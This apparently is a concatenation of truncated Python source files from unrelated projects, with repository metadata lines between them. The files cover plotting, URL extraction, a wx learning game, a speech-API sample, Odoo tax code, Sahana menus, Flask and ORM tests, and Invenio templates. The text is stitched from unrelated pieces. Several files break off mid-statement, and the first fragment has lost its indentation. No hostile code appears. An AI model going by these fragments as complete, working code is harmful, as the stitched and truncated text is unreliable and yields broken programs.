gs = gridspec.GridSpec(2,3, wspace = 0.3, hspace = 0.4, width_ratios = [1,0.8,1], height_ratios = [1,0.9])
#########################################################################
# A. Examples shank
#########################################################################
# see main_search_examples_fig3.py
# neurons_to_plot = ['Mouse17-130207_39', 'Mouse17-130207_43', 'Mouse17-130207_37']
neurons_to_plot = ['Mouse17-130207_42', 'Mouse17-130207_37']
neuron_seed = 'Mouse17-130207_43'
titles = ['Wake', 'REM', 'NREM']
# colors = ['#384d48', '#7a9b76', '#6e7271']
# cNorm = colors.Normalize(vmin=0, vmax = 1)
# scalarMap = cmx.ScalarMappable(norm=cNorm, cmap = viridis)
# color1 = scalarMap.to_rgba(1)
# color2 = 'crimson'
# color1 = 'steelblue'
# color3 = 'darkgrey'
# color1 = '#003049'
# color2 = '#d62828'
# color3 = '#fcbf49'
# color1 = 'blue'
# color2 = 'darkgrey'
# color3 = 'red'
cmap = get_cmap('tab10')
color1 = cmap(0)
color2 = cmap(1)
color3 = cmap(2)
colors = [color1, color3]
color_ex = [color1, color2, color3]
# axG = subplot(gs[2,:])
axA = subplot(gs[0,:])
noaxis(axA)
gsA = gridspec.GridSpecFromSubplotSpec(1,3,subplot_spec=gs[0,:],width_ratios=[0.6,0.6,0.6], hspace = 0.2, wspace = 0.2)#, height_ratios = [1,1,0.2,1])
new_path = data_directory+neuron_seed.split('-')[0]+'/'+neuron_seed.split("_")[0]
meanWaveF = scipy.io.loadmat(new_path+'/Analysis/SpikeWaveF.mat')['meanWaveF'][0]
lw = 3
# WAWEFORMS
gswave = gridspec.GridSpecFromSubplotSpec(1,3,subplot_spec = gsA[0,1])#, wspace = 0.3, hspace = 0.6)
axmiddle = subplot(gswave[:,1])
noaxis(gca())
for c in range(8):
plot(meanWaveF[int(neuron_seed.split('_')[1])][c]+c*200, color = color2, linewidth = lw)
title("Mean waveforms (a.u.)", fontsize = 16)
idx = [0,2]
for i, n in enumerate(neurons_to_plot):
axchan = subplot(gswave[:,idx[i]])
noaxis(axchan)
for c in range(8):
plot(meanWaveF[int(n.split('_')[1])][c]+c*200, color = colors[i], linewidth = lw)
# # ylabel("Channels")
# if i == 0:
# gca().text(-0.4, 1.06, "b", transform = gca().transAxes, fontsize = 16, fontweight='bold')
cax = inset_axes(axmiddle, "100%", "5%",
|
juposocial/jupo
|
src/lib/url.py
|
Python
|
agpl-3.0
| 2,529
| 0.016607
|
#! coding: utf-8
import re
from urllib import quote
from urlparse import urlsplit, urlunsplit
TRAILING_PUNCTUATION = ['.', ',', ':', ';', '.)']
WRAPPING_PUNCTUATION = [('(', ')'), ('<', '>'), ('[', ']'), ('<', '>')]
unquoted_percents_re = re.compile(r'%(?![0-9A-Fa-f]{2})')
word_split_re = re.compile(r'(\s+)')
simple_url_re = re.compile(r'^https?://\[?\w', re.IGNORECASE)
simple_url_2_re = re.compile(r'^www\.|^(?!http)\w[^@]+\.(com|edu|gov|int|mil|net|org)$', re.IGNORECASE)
def smart_urlquote(url):
"Quotes a URL if it isn't already quoted."
# Handle IDN before quoting.
try:
scheme, netloc, path, query, fragment = urlsplit(url)
try:
netloc = netloc.encode('idna').decode('ascii') # IDN -> ACE
except UnicodeError: # invalid domain part
pass
else:
url = urlunsplit((scheme, netloc, path, query, fragment))
except ValueError:
# invalid IPv6 URL (normally square brackets in hostname part).
pass
# An URL is considered unquoted if it contains no % characters or
# contains a % not followed by two hexadecimal digits. See #9655.
if '%' not in url or unquoted_percents_re.search(url):
# See http://bugs.python.org/issue2637
url = quote(url, safe=b'!*\'();:@&=+$,/?#[]~')
return url
def extract_urls(text):
"""
Works on http://, https://, www. links, and also on links ending in one of
the original seven gTLDs (.com, .edu, .gov, .int, .mil, .net, and .org).
Links can have trailing punctuation (periods, commas, close-parens) and
leading punctuation (opening parens) and it'll still do the right thing.
"""
words = word_split_re.split(text)
urls = []
for i, word in enumerate(words):
if '.' in word or ':' in word:
# Deal with punctuation.
lead, middle, trail = '', word, ''
for punctuation in TRAILING_PUNCTUATION:
if middle.endswith(punctuation):
middle = middle[:-len(punctuation)]
trail = punctuation + trail
for opening, closing in WRAPPING_PUNCTUATION:
if middle.startswith(opening):
middle = middle[len(opening):]
lead = lead + opening
# Keep parentheses at the end only if they're balanced.
if (middle.endswith(closing)
and middle.count(closing) == middle.count(opening) + 1):
middle = middle[:-len(closing)]
trail = closing + trail
if simple_url_re.match(middle) or simple_url_2_re.match(middle):
urls.append(smart_urlquote(middle))
return urls
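# Quick usage sketch (hypothetical input, for illustration only):
#
#     urls = extract_urls('docs at http://example.com/a, also (www.example.org).')
#     # -> ['http://example.com/a', 'www.example.org']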
|
nhatbui/LebronCoin
|
lebroncoin/key_loader.py
|
Python
|
mit
| 654
| 0.001529
|
def load_keys(filepath):
"""
    Loads the Twitter API keys into a dict.
:param filepath: file path to config file with Twitter API keys.
:return: keys_dict
:raise: IOError
"""
try:
keys_file = open(filepath, 'rb')
keys = {}
        for line in keys_file:
key, value = line.split('=')
keys[key.strip()] = value.strip()
except IOError:
message = ('File {} cannot be opened.'
' Check that it exists and is binary.')
print message.format(filepath)
raise
except:
print "Error opening or unpickling file."
raise
return keys
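# Minimal usage sketch (the file name and key names below are hypothetical):
#
#     keys = load_keys('twitter_api.keys')   # file holds lines like CONSUMER_KEY = abc123
#     consumer_key = keys['CONSUMER_KEY']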
|
bjura/EPlatform
|
EMatch.py
|
Python
|
gpl-3.0
| 18,227
| 0.038094
|
#!/bin/env python2.7
# -*- coding: utf-8 -*-
# This file is part of EPlatform.
#
# EPlatform is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# EPlatform is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EPlatform. If not, see <http://www.gnu.org/licenses/>.
import wxversion
wxversion.select('2.8')
import glob, os, time
import time
from random import shuffle
import wx
import wx.lib.buttons as bt
from pymouse import PyMouse
import Tkinter
import numpy as np
import subprocess as sp
import shlex
import pygame
from pygame import mixer
import check
#"nazwij obrazek"
class cwiczenia(wx.Frame):
def __init__(self, parent, id):
wx.Frame.__init__( self , parent , id , 'EMatch')
self.Maximize( True )
self.winWidth, self.winHeight = wx.DisplaySize( )
self.parent=parent
style = self.GetWindowStyle()
self.SetWindowStyle( style | wx.STAY_ON_TOP )
self.initializeParameters()
self.createGui()
self.initializeTimer()
self.Bind( wx.EVT_CLOSE , self.OnExit )
def initializeParameters(self):
self.pathToEPlatform = './'
with open( self.pathToEPlatform + 'parameters', 'r' ) as parametersFile:
for line in parametersFile:
if line[ :line.find('=')-1 ] == 'timeGap':
self.timeGap = int( line[ line.rfind('=')+2:-1 ] )
elif line[ :line.find('=')-1 ] == 'backgroundColour':
self.backgroundColour = line[ line.rfind('=')+2:-1 ]
elif line[ :line.find('=')-1 ] == 'textColour':
self.textColour = line[ line.rfind('=')+2:-1 ]
elif line[ :line.find('=')-1 ] == 'scanningColour':
self.scanningColour = line[ line.rfind('=')+2:-1 ]
elif line[ :line.find('=')-1 ] == 'selectionColour':
self.selectionColour = line[ line.rfind('=')+2:-1 ]
elif line[ :line.find('=')-1 ] == 'musicVolume':
pass
elif line[ :line.find('=')-1 ] == 'filmVolume':
pass
elif not line.isspace( ):
print '\nNiewłaściwie opisany parametr. Błąd w linii:\n%s' % line
self.timeGap = 1500
self.backgroundColour = 'white'
self.textColour = 'black'
self.scanningColour = '#E7FAFD'
self.selectionColour = '#9EE4EF'
with open( self.pathToEPlatform + 'parametersCW', 'r' ) as parametersFile:
for line in parametersFile:
if line[ :line.find('=')-1 ] == 'textSize':
self.textSize = int( line[ line.rfind('=')+2:-1 ])
elif line[ :line.find('=')-1 ] == 'checkTime':
pass
elif line[ :line.find('=')-1 ] == 'colorGrat':
pass
elif line[ :line.find('=')-1 ] == 'maxPoints':
self.maxPoints = int(line[ line.rfind('=')+2:-1 ])
elif line[ :line.find('=')-1 ] == 'colorNiest':
pass
elif line[ :line.find('=')-1 ] == 'ileLuk':
pass
elif not line.isspace( ):
print 'Niewłaściwie opisane parametry'
print 'Błąd w linii', line
self.textSize=80
                self.maxPoints=2
self.flaga=0
self.PicNr=0
self.result=0
self.mouseCursor = PyMouse( )
self.WordsList=os.listdir(self.pathToEPlatform+'multimedia/pictures')
shuffle(self.WordsList)
self.poczatek=True
self.numberOfPresses = 1
self.czyBack=False
mixer.init()
self.numberOfExtraWords= 4
#self.ktorySizer='wyrazy'
def initializeTimer(self):
id1=wx.NewId()
wx.RegisterId(id1)
self.stoper = wx.Timer(self,id1)
self.Bind( wx.EVT_TIMER, self.timerUpdate, self.stoper,id1 )
#self.id2=wx.NewId()
#wx.RegisterId(self.id2)
#self.stoper2 = wx.Timer( self ,self.id2)
self.id3=wx.NewId()
wx.RegisterId(self.id3)
self.stoper3 = wx.Timer( self ,self.id3)
self.id4=wx.NewId()
wx.RegisterId(self.id4)
self.stoper4=wx.Timer(self,self.id4)
self.Bind(wx.EVT_TIMER, self.pomocniczyStoper, self.stoper4,self.id4 )
self.stoper.Start( self.timeGap )
def timerUpdate(self,event):
self.mouseCursor.move( self.winWidth - 12, self.winHeight - 12 )
self.numberOfPresses = 0
'''for i in range(5):
item = self.subSizer.GetChildren()
b=item[i].GetWindow()
b.SetBackgroundColour( self.backgroundColour )
b.SetFocus()
for i in range(self.numberOfExtraWords+1):
item = self.wordSizer.GetChildren()
b=item[i].GetWindow()
b.SetBackgroundColour( self.backgroundColour )
b.SetFocus()'''
if self.flaga<= self.numberOfExtraWords+1 and self.flaga>0:
item = self.wordSizer.GetChildren()
b = item[self.flaga-1].GetWindow()
b.SetBackgroundColour( self.backgroundColour )
b.SetFocus()
else:
if self.flaga==0:
item = self.subSizer.GetChildren()
b=item[len(item)-1].GetWindow()
b.SetBackgroundColour( self.backgroundColour )
b.SetFocus()
else:
item = self.subSizer.GetChildren()
b=item[self.flaga-self.numberOfExtraWords -2].GetWindow()
b.SetBackgroundColour( self.backgroundColour )
b.SetFocus()
if self.poczatek:
time.sleep(1)
self.stoper.Stop()
            mixer.music.load(self.pathToEPlatform+'multimedia/voices/'+str(self.word)+'.ogg')
|
mixer.music.play()
time.sleep(2)
self.stoper.Start(self.timeGap)
self.poczatek=False
if self.flaga >= self.numberOfExtraWords+1:
item = self.subSizer.GetChildren()
b=item[self.flaga-self.numberOfExtraWords -1].GetWindow()
b.SetBackgroundColour( self.scanningColour )
b.SetFocus()
else:
item = self.wordSizer.GetChildren()
b = item[self.flaga].GetWindow()
b.SetBackgroundColour( self.scanningColour )
b.SetFocus()
if self.flaga== 4 +self.numberOfExtraWords+1:
self.flaga=0
else:
self.flaga+=1
def createGui(self):
if self.PicNr ==len(self.WordsList):
self.PicNr=0
self.picture=self.WordsList[self.PicNr]
self.PicNr+=1
self.path=self.pathToEPlatform+'multimedia/pictures/'
im=wx.ImageFromStream( open(self.path+self.picture, "rb"))
x=im.GetWidth()
y=im.GetHeight()
if x >y:
im=im.Scale(600,500)
elif x==y:
im=im.Scale(600,600)
else:
im=im.Scale(500,600)
picture=wx.BitmapFromImage(im)
self.word=self.picture[:self.picture.index('.')]
        self.extraWords=[] # picks the additional words
while len(self.extraWords)<self.numberOfExtraWords:
slowo=self.WordsList[np.random.randint(0,len(self.Wor
|
googleapis/python-speech
|
samples/snippets/transcribe_enhanced_model.py
|
Python
|
apache-2.0
| 2,170
| 0.000461
|
#!/usr/bin/env python
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Google Cloud Speech API sample that demonstrates enhanced models
and recognition metadata.
Example usage:
python transcribe_enhanced_model.py resources/commercial_mono.wav
"""
import argparse
def transcribe_file_with_enhanced_model(path):
"""Transcribe the given audio file using an enhanced model."""
# [START speech_transcribe_enhanced_model]
import io
from google.cloud import speech
client = speech.SpeechClient()
# path = 'resources/commercial_mono.wav'
with io.open(path, "rb") as audio_file:
content = audio_file.read()
audio = speech.RecognitionAudio(content=content)
config = speech.RecognitionConfig(
encoding=speech.RecognitionConfig.AudioEncoding.LINEAR16,
sample_rate_hertz=8000,
language_code="en-US",
use_enhanced=True,
# A model must be specified to use enhanced model.
model="phone_call",
)
response = client.recognize(config=config, audio=audio)
for i, result in enumerate(response.results):
alternative = result.alternatives[0]
print("-" * 20)
print("First alternative of result {}".format(i))
print("Transcript: {}".format(alternative.transcript))
# [END speech_transcribe_enhanced_model]
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument("path", help="File to stream to the API")
args = parser.parse_args()
transcribe_file_with_enhanced_model(args.path)
|
t3dev/odoo
|
addons/account_tax_python/models/account_tax.py
|
Python
|
gpl-3.0
| 4,229
| 0.010877
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import models, fields, api
from odoo.tools.safe_eval import safe_eval
class AccountTaxPython(models.Model):
_inherit = "account.tax"
amount_type = fields.Selection(selection_add=[('code', 'Python Code')])
python_compute = fields.Text(string='Python Code', default="result = price_unit * 0.10",
help="Compute the amount of the tax by setting the variable 'result'.\n\n"
":param base_amount: float, actual amount on which the tax is applied\n"
":param price_unit: float\n"
":param quantity: float\n"
":param company: res.company recordset singleton\n"
":param product: product.product recordset singleton or None\n"
":param partner: res.partner recordset singleton or None")
python_applicable = fields.Text(string='Applicable Code', default="result = True",
help="Determine if the tax will be applied by setting the variable 'result' to True or False.\n\n"
":param price_unit:
|
float\n"
":param quantity: float\n"
":param company: res.company recordset singleton\n"
":param product: product.product recordset singleton or None\n"
":param partner: res.partner recordset singleton or None")
def _compute_amount(self, base_amount, price_unit, quantity=1.0, product=None, partner=None):
self.ensure_one()
if self.amount_type == 'code':
company = self.env.user.company_id
            localdict = {'base_amount': base_amount, 'price_unit':price_unit, 'quantity': quantity, 'product':product, 'partner':partner, 'company': company}
safe_eval(self.python_compute, localdict, mode="exec", nocopy=True)
return localdict['result']
return super(AccountTaxPython, self)._compute_amount(base_amount, price_unit, quantity, product, partner)
@api.multi
def compute_all(self, price_unit, currency=None, quantity=1.0, product=None, partner=None):
taxes = self.filtered(lambda r: r.amount_type != 'code')
company = self.env.user.company_id
for tax in self.filtered(lambda r: r.amount_type == 'code'):
localdict = self._context.get('tax_computation_context', {})
localdict.update({'price_unit': price_unit, 'quantity': quantity, 'product': product, 'partner': partner, 'company': company})
safe_eval(tax.python_applicable, localdict, mode="exec", nocopy=True)
if localdict.get('result', False):
taxes += tax
return super(AccountTaxPython, taxes).compute_all(price_unit, currency, quantity, product, partner)
class AccountTaxTemplatePython(models.Model):
_inherit = 'account.tax.template'
amount_type = fields.Selection(selection_add=[('code', 'Python Code')])
python_compute = fields.Text(string='Python Code', default="result = price_unit * 0.10",
help="Compute the amount of the tax by setting the variable 'result'.\n\n"
":param base_amount: float, actual amount on which the tax is applied\n"
":param price_unit: float\n"
":param quantity: float\n"
":param product: product.product recordset singleton or None\n"
":param partner: res.partner recordset singleton or None")
python_applicable = fields.Text(string='Applicable Code', default="result = True",
help="Determine if the tax will be applied by setting the variable 'result' to True or False.\n\n"
":param price_unit: float\n"
":param quantity: float\n"
":param product: product.product recordset singleton or None\n"
":param partner: res.partner recordset singleton or None")
def _get_tax_vals(self, company, tax_template_to_tax):
""" This method generates a dictionnary of all the values for the tax that will be created.
"""
self.ensure_one()
res = super(AccountTaxTemplatePython, self)._get_tax_vals(company, tax_template_to_tax)
res['python_compute'] = self.python_compute
res['python_applicable'] = self.python_applicable
return res
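# Illustrative only (not from the source): the kind of snippet an administrator
# could store in 'python_compute' / 'python_applicable', following the contract
# described in the help texts above. Only the documented local variables are used;
# the concrete formula is a made-up example.
#
#   python_compute:    result = min(price_unit * quantity * 0.10, 100.0)
#   python_applicable: result = quantity > 0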
|
flavour/tldrmp
|
private/templates/IFRC/menus.py
|
Python
|
mit
| 31,780
| 0.005129
|
# -*- coding: utf-8 -*-
from gluon import current
from s3 import *
from s3layouts import *
try:
from .layouts import *
except ImportError:
pass
import s3menus as default
red_cross_filter = {"organisation.organisation_type_id$name" : "Red Cross / Red Crescent"}
# =============================================================================
class S3MainMenu(default.S3MainMenu):
""" Custom Application Main Menu """
# -------------------------------------------------------------------------
@classmethod
def menu(cls):
""" Compose Menu """
# Modules menus
main_menu = MM()(
cls.menu_modules(),
)
# Additional menus
current.menu.personal = cls.menu_personal()
current.menu.dashboard = cls.menu_dashboard()
return main_menu
# -------------------------------------------------------------------------
@classmethod
def menu_modules(cls):
""" Custom Modules Menu """
T = current.T
return [
homepage("gis")(
),
homepage("hrm", "org", name=T("Staff"),
vars=dict(group="staff"))(
MM("Staff", c="hrm", f="staff"),
MM("Teams", c="hrm", f="group"),
MM("National Societies", c="org", f="organisation",
vars = red_cross_filter),
MM("Offices", c="org", f="office"),
MM("Job Titles", c="hrm", f="job_title"),
#MM("Skill List", c="hrm", f="skill"),
MM("Training Events", c="hrm", f="training_event"),
MM("Training Courses", c="hrm", f="course"),
MM("Certificate List", c="hrm", f="certificate"),
),
homepage("vol", name=T("Volunteers"))(
MM("Volunteers", c="vol", f="volunteer"),
MM("Teams", c="vol", f="group"),
MM("Volunteer Roles", c="vol", f="job_title"),
MM("Programs", c="vol", f="programme"),
#MM("Skill List", c="vol", f="skill"),
MM("Training Events", c="vol", f="training_event"),
MM("Training Courses", c="vol", f="course"),
MM("Certificate List", c="vol", f="certificate"),
),
homepage("member")(
MM("Members", c="member", f="membership"),
),
homepage("inv", "supply", "req")(
MM("Warehouses", c="inv", f="warehouse"),
|
MM("Received Shipments", c="inv", f="recv"),
MM("Sent Shipments", c="inv", f="send"),
MM("Items", c="supply", f="item"),
MM("Item Catalogs", c="s
|
upply", f="catalog"),
MM("Item Categories", c="supply", f="item_category"),
M("Requests", c="req", f="req")(),
#M("Commitments", f="commit")(),
),
homepage("asset")(
MM("Assets", c="asset", f="asset"),
MM("Items", c="asset", f="item"),
),
homepage("survey")(
MM("Assessment Templates", c="survey", f="template"),
MM("Disaster Assessments", c="survey", f="series"),
),
homepage("project")(
MM("Projects", c="project", f="project"),
MM("Communities", c="project", f="location"),
),
homepage("vulnerability")(
MM("Map", c="vulnerability", f="index"),
),
homepage("event", "irs")(
MM("Events", c="event", f="event"),
MM("Incident Reports", c="irs", f="ireport"),
),
homepage("deploy", name="RDRT")(
MM("Missions", c="deploy", f="mission", m="summary"),
MM("Members", c="deploy", f="human_resource", m="summary"),
),
]
# -------------------------------------------------------------------------
@classmethod
def menu_dashboard(cls):
""" Dashboard Menu (at bottom of page) """
DB = S3DashBoardMenuLayout
request = current.request
if request.controller == "vol":
dashboard = DB()(
DB("VOLUNTEERS",
c="vol",
image = "graphic_staff_wide.png",
title = "Volunteers")(
DB("Manage Volunteer Data", f="volunteer"),
DB("Manage Teams Data", f="group"),
),
DB("CATALOGS",
c="hrm",
image="graphic_catalogue.png",
title="Catalogs")(
DB("Certificates", f="certificate"),
DB("Training Courses", f="course"),
#DB("Skills", f="skill"),
DB("Job Titles", f="job_title")
))
elif request.controller in ("hrm", "org"):
dashboard = DB()(
DB("STAFF",
c="hrm",
image = "graphic_staff_wide.png",
title = "Staff")(
DB("Manage Staff Data", f="staff"),
DB("Manage Teams Data", f="group"),
),
DB("OFFICES",
c="org",
image = "graphic_office.png",
title = "Offices")(
DB("Manage Offices Data", f="office"),
DB("Manage National Society Data", f="organisation",
vars=red_cross_filter
),
),
DB("CATALOGS",
c="hrm",
image="graphic_catalogue.png",
title="Catalogs")(
DB("Certificates", f="certificate"),
DB("Training Courses", f="course"),
#DB("Skills", f="skill"),
DB("Job Titles", f="job_title")
))
elif request.controller == "default" and request.function == "index":
dashboard = DB(_id="dashboard")(
DB("Staff", c="hrm", f="staff", m="search",
image = "graphic_staff.png",
title = "Staff",
text = "Add new and manage existing staff."),
DB("Volunteers", c="vol", f="volunteer", m="search",
image = "graphic_volunteers.png",
title = "Volunteers",
text = "Add new and manage existing volunteers."),
DB("Members", c="member", f="index",
image = "graphic_members.png",
title = "Members",
text = "Add new and manage existing members."),
DB("Warehouses", c="inv", f="index",
image = "graphic_warehouse.png",
title = "Warehouses",
text = "Stocks and relief items."),
DB("Assets", c="asset", f="index",
image = "graphic_assets.png",
title = "Assests",
text = "Manage office inventories and assets."),
DB("Assessments", c="survey", f="index",
image = "graphic_assessments.png",
title = "Assessments",
text = "Design, deploy & analyze surveys."),
DB("Projects", c="project", f="index",
image = "graphic_tools.png",
title = "Projects",
text = "Tracking and analysis of Projects and Activities.")
)
else:
dashboard = None
return dashboard
# -------------------------------------------------------------------------
@classmethod
def menu_personal(cls):
""" Custom Personal Menu """
auth = current.auth
s3 = current.response.s3
settings = current.deployment_settings
# Language selector
menu_lang = ML("Language", right=True)
for language in s3.l10n_languages.items():
code, name = language
|
loogica/urlsh
|
test_views.py
|
Python
|
mit
| 2,651
| 0.002641
|
import os
import shutil
|
import unittest
from flask import json
class NewsView(unittest.TestCase):
def setUp(self):
import web
reload(web)
        self.app = web.app.test_client()
def tearDown(self):
try:
shutil.rmtree('urlshortner')
except:
pass
def test_get_home(self):
response = self.app.get('/', follow_redirects=True)
assert 200 == response.status_code
assert 'Loogi.ca' in response.data
assert 'input' in response.data
def test_urls(self):
response = self.app.get('/urls/')
assert 200 == response.status_code
assert {} == json.loads(response.data)
def test_get_ranking(self):
response = self.app.get('/ranking')
assert 200 == response.status_code
assert 'Ranking' in response.data
def test_add_url(self):
data = json.dumps(dict(url='http://loogi.ca'))
response = self.app.post('/add_url/', data=data,
content_type="application/json")
assert 200 == response.status_code
assert 'http://loogi.ca' == json.loads(response.data)['url']
assert 'shortned' in json.loads(response.data)
def test_add_url_custom_shortned(self):
data = json.dumps(dict(url='http://loogi.ca', shortned='loogica'))
response = self.app.post('/add_url/', data=data,
content_type="application/json")
assert 200 == response.status_code
assert 'http://loogi.ca' == json.loads(response.data)['url']
assert 'shortned' in json.loads(response.data)
assert 'loogica' == json.loads(response.data)['shortned']
def test_add_invalid_url(self):
data = json.dumps(dict(url='loogica'))
response = self.app.post('/add_url/', data=data,
content_type="application/json")
assert 200 == response.status_code
assert 'error' in json.loads(response.data)
def test_resolved(self):
data = json.dumps(dict(url='http://loogi.ca'))
response = self.app.post('/add_url/', data=data,
content_type="application/json")
url_short_id = json.loads(response.data)['shortned']
response = self.app.get('/%s' % url_short_id)
assert 302 == response.status_code
assert 'Location' in str(response.headers)
assert 'http://loogi.ca' in str(response.headers)
def test_bad_resolved(self):
response = self.app.get('/invalid')
assert 404 == response.status_code
|
jaredlunde/cargo-orm
|
unit_tests/fields/Cidr.py
|
Python
|
mit
| 2,247
| 0.000445
|
#!/usr/bin/python3 -S
# -*- coding: utf-8 -*-
import netaddr
from cargo.fields import Cidr
from unit_tests.fields.Field import TestField
from unit_tests import configure
class TestCidr(configure.NetTestCase, TestField):
@property
def base(self):
return self.orm.cidr
def test___call__(self):
base = Cidr()
self.assertEqual(base.value, base.empty)
base('127.0.0.1/32')
self.assertIsInstance(base.value, netaddr.IPNetwork)
def test_insert(self):
self.base('127.0.0.1/32')
val = getattr(self.orm.new().insert(self.base), self.base.field_name)
self.assertEqual(str(val.value), '127.0.0.1/32')
def test_select(self):
self.base('127.0.0.1/32')
self.orm.insert(self.base)
val = self.orm.new().desc(self.orm.uid).get()
self.assertEqual(str(getattr(val, self.base.field_name).value),
'127.0.0.1/32')
def test_array_insert(self):
arr = ['127.0.0.1/32', '127.0.0.2/32', '127.0.0.3/32']
self.base_array(arr)
val = getattr(self.orm.new().insert(self.base_array),
self.base_array.field_name)
self.assertListEqual(list(map(str,
|
val.value)), arr)
def test_array_select(self):
arr = ['127.0.0.1/32', '127.0.0.2/32', '127.0.0.3/32']
self.base_array(arr)
val = getattr(self.orm.new().insert(self.base_array),
self.base_array.field_name)
val_b = getattr(self.orm.new().desc(self.orm.uid).get(),
|
self.base_array.field_name)
self.assertListEqual(list(map(str, val.value)), list(map(str, val_b.value)))
def test_type_name(self):
self.assertEqual(self.base.type_name, 'cidr')
self.assertEqual(self.base_array.type_name, 'cidr[]')
class TestEncCidr(TestCidr):
@property
def base(self):
return self.orm.enc_cidr
def test_init(self, *args, **kwargs):
pass
def test_type_name(self):
self.assertEqual(self.base.type_name, 'text')
self.assertEqual(self.base_array.type_name, 'text[]')
if __name__ == '__main__':
# Unit test
configure.run_tests(TestCidr, TestEncCidr, verbosity=2, failfast=True)
|
jmacmahon/invenio
|
modules/websearch/lib/websearch_external_collections_templates.py
|
Python
|
gpl-2.0
| 7,238
| 0.005388
|
# -*- coding: utf-8 -*-
# This file is part of Invenio.
# Copyright (C) 2006, 2007, 2008, 2010, 2011 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Template for the external collections search."""
__revision__ = "$Id$"
import cgi
from invenio.config import CFG_SITE_LANG
from invenio.messages import gettext_set_language
from invenio.urlutils import create_html_link
class Template:
"""Template class for the external collection search. To be loaded with template.load()"""
def __init__(self):
pass
def external_collection_seealso_box(self, lang, links,
prolog_start='<table class="externalcollectionsbox"><tr><th colspan="2" class="externalcollectionsboxheader">',
prolog_end='</th></tr><tr><td class="externalcollectionsboxbody">',
column_separator='</td><td class="externalcollectionsboxbody">',
link_separator= '<br />', epilog='</td></tr></table>'):
"""Creates the box that proposes links to other useful search engines like Google.
lang: string - The language to display in
links: list of string - List of links to display in the box
prolog_start, prolog_end, column_separator, link_separator, epilog': strings -
default HTML code for the specified position in the box"""
_ = gettext_set_language(lang)
out = ""
if links:
out += '<a name="externalcollectionsbox"></a>'
out += prolog_start
out += _("Haven't found what you were looking for? Try your search on other servers:")
out += prolog_end
nb_out_links_in_one_column = len(links)/2 + len(links) % 2
out += link_separator.join(links[:nb_out_links_in_one_column])
out += column_separator
out += link_separator.join(links[nb_out_links_in_one_column:])
out += epilog
return out
def external_collection_overview(self, lang=CFG_SITE_LANG, engine_list=()):
"""Prints results overview box with links to particular collections below.
lang: The language to display
engine_list: The external engines to be used"""
if len(engine_list) < 1:
return ""
_ = gettext_set_language(lang)
out = """
<table class="externalcollectionsresultsbox">
<thead>
<tr>
<th class="externalcollectionsresultsboxheader"><strong>%s</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td class="externalcollectionsresultsboxbody"> """ % _("External collections results overview:")
for engine in engine_list:
internal_name = get_link_name(engine.name)
name = _(engine.name)
out += """<strong><a href="#%(internal_name)s">%(name)s</a></strong><br />""" % locals()
out += """
</td>
</tr>
</tbody>
</table>
"""
return out
def print_info_line(req,
html_external_engine_name_box,
html_external_engine_nb_results_box,
html_external_engine_nb_seconds_box):
"""Print on req an information line about results of an external collection search."""
req.write('<table class="externalcollectionsresultsbox"><tr>')
req.write('<td class="externalcollectionsresultsboxheader">')
req.write('<big><strong>' + \
              html_external_engine_name_box + \
'</strong></big>')
req.write(' ')
req.write(html_external_engine_nb_results_box)
req.write('</td><td class="externalcollectionsresultsboxheader" width="20%" align="right">')
req.write('<small>' + \
html_external_engine_nb_seconds_box + \
'</small>')
req.write('</td></tr></table><br />')
def print_timeout(req, lang, engine, name, url):
"""Prin
|
t info line for timeout."""
_ = gettext_set_language(lang)
req.write('<a name="%s"></a>' % get_link_name(engine.name))
print_info_line(req,
create_html_link(url, {}, name, {}, False, False),
'',
_('Search timed out.'))
message = _("The external search engine has not responded in time. You can check its results here:")
req.write(message + ' ' + create_html_link(url, {}, name, {}, False, False) + '<br />')
def get_link_name(name):
"""Return a hash string for the string name."""
return hex(abs(name.__hash__()))
def print_results(req, lang, pagegetter, infos, current_time, print_search_info=True, print_body=True):
"""Print results of a given search engine.
    current_time is actually the duration of the request execution, expressed in seconds.
"""
_ = gettext_set_language(lang)
url = infos[0]
engine = infos[1]
internal_name = get_link_name(engine.name)
name = _(engine.name)
base_url = engine.base_url
results = engine.parser.parse_and_get_results(pagegetter.data)
html_tit = make_url(name, base_url)
if print_search_info:
num = format_number(engine.parser.parse_num_results())
if num:
if num == '0':
html_num = _('No results found.')
html_sec = ''
else:
html_num = '<strong>' + \
make_url(_('%s results found') % num, url) + \
'</strong>'
html_sec = '(' + _('%s seconds') % ('%2.2f' % current_time) + ')'
else:
html_num = _('No results found.')
html_sec = ''
req.write('<a name="%(internal_name)s"></a>' % locals())
print_info_line(req,
html_tit,
html_num,
html_sec)
if print_body:
for result in results:
req.write(result.html + '<br />')
if not results:
req.write(_('No results found.') + '<br />')
def make_url(name, url):
if url:
return '<a href="' + cgi.escape(url) + '">' + name + '</a>'
else:
return name
def format_number(num, separator=','):
"""Format a number by separating thousands with a separator (by default a comma)
>>> format_number(10)
'10'
>>> format_number(10000)
'10,000'
>>> format_number(' 000213212424249 ', '.')
'213.212.424.249'
"""
result = ""
try:
num = int(num)
except:
return None
if num == 0:
return '0'
while num > 0:
part = num % 1000
